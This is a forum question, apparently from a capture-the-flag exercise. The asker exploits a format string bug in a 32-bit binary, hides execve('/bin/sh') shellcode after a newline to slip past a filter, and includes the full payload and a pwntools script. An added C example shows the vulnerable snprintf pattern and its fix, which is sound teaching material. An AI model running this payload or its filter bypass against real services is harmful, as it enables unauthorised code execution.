
I tried to solve this problem. I found a format string bug (FSB) at 0x08048bfe in `_snprintf`. I loaded the shellcode after a `\n`. The `ssc` function checks whether the user input includes `/bin/sh`.

Most shellcode includes `/bin/sh`. I found that the `ssc` function checks only the string before the `\n`. I used this shellcode and changed it a little. My final shellcode is:

'\x0c\xd5\xff\xff'*2+'\x0e\xd5\xff\xff'*2+'%10x'*3+'%45345c'+'%n'+'%22197c'+'%n'+'\n'+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n"

I get a shell (/bin/bash) with gdb, but I can't get a shell without gdb. I want to know the reason.

I used this script:

from pwn import *
import time

# Format-string payload for the challenge binary (32-bit). The first eight bytes
# are two target addresses (0xffffd50c and 0xffffd50e, stack addresses observed
# under gdb), the '%10x' fields step through the arguments, the '%...c' widths
# set the byte count and the two '%n' write it. Everything after the first '\n'
# is the NOP sled plus shellcode, which the ssc check does not look at.
# Modern pwntools runs on Python 3, so the payload must be bytes, not str.
payload = (b'\x0c\xd5\xff\xff' * 2 + b'\x0e\xd5\xff\xff' * 2
           + b'%10x' * 3 + b'%45375c' + b'%n' + b'%22167c' + b'%n' + b'\n'
           + b'\x90' * 50
           + b'\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e'
             b'\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80\n')

proc = remote('localhost', 23456)
proc.recv(1024)          # read the banner/prompt
proc.sendline(payload)
time.sleep(5)            # give the service time to process the input
proc.interactive()
Jedi

Damotorie

0 Answers
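The bug class behind this question is a format string passed under attacker control to `snprintf`. The following is an added example, not the challenge binary's code or the asker's script: it puts the vulnerable pattern next to the one-character fix and includes a check that shows the difference. The function names and the input strings are constructed for the illustration.

```c
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern: the user's text *is* the format string, so any
 * '%' directive in it is interpreted by snprintf. Compilers flag this
 * with -Wformat-security ("format not a string literal and no format
 * arguments"), which is the cheapest detection for this bug class. */
void log_message_vulnerable(char *out, size_t outsz, const char *user_input)
{
    snprintf(out, outsz, user_input);
}

/* Fixed pattern: a constant format string; the user's text is only data. */
void log_message_fixed(char *out, size_t outsz, const char *user_input)
{
    snprintf(out, outsz, "%s", user_input);
}

/* Returns 1 if the input reached the buffer byte-for-byte, 0 if some
 * '%' directive was interpreted along the way. The input "100%%" is used
 * because "%%" is always defined: the vulnerable version collapses it
 * to a single '%', the fixed version keeps both characters. */
int message_preserved(void (*fn)(char *, size_t, const char *), const char *input)
{
    char buf[128];
    fn(buf, sizeof buf, input);
    return strcmp(buf, input) == 0;
}

int main(void)
{
    const char *probe = "100%%"; /* constructed test input */
    printf("vulnerable preserves input: %d\n",
           message_preserved(log_message_vulnerable, probe));
    printf("fixed preserves input:      %d\n",
           message_preserved(log_message_fixed, probe));
    return 0;
}
```

Building with `gcc -Wformat -Wformat-security` (or `-Werror=format-security` in CI) turns the vulnerable function into a compile-time finding; the fixed function compiles silently because the format is a literal.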